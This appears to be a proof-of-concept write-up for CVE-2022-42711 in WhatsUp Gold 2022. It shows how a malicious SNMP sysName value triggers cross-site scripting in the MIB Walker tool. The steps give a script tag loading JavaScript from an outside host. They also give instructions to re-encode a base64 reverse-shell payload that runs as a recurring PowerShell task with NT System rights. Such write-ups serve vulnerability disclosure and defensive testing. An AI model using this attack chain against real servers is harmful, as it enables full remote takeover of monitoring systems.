Whats Up Gold 2022

< v. 22.1.0

https://nvd.nist.gov/vuln/detail/CVE-2022-42711
https://community.progress.com/s/article/Product-Alert-Bulletin-October-2022

Improper validation of strings from SNMP devices when using the SNMP MIB Walker, makes the application prone to a reflected XXS attack.

Steps To Reproduce:

  1. Place a XSS payload in the SNMPD.conf on a Linux computer. Have the payload open a javascript file hosted on a HTTPS webserver (Because WhatsUpGold uses HTTPS, you cannot link to a HTTP webserver). SNMP walk the Linux computers IP.
  2. Modify script below to run revshell. You can de-base my payload and change IP and port, then base64 encode again and put it in script. Or run another payload of course.
  3. Save the script on a webserver
  4. Add XSS pointing at url of script in SNMPD config, I placed it in sysName:
    sysContact Me <[email protected]>
    sysLocation Home
    sysName LinuxPC<script src='https://f20.be/t.js'/>
  5. Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer

Script

Function of script

  • It will make an powershell-task, containing reverse shell in this example
  • Trigger the task to run every five minutes

Impact

The attacker will have Remote Code Execution as the "NT System" account. Full control of the server.

POC Video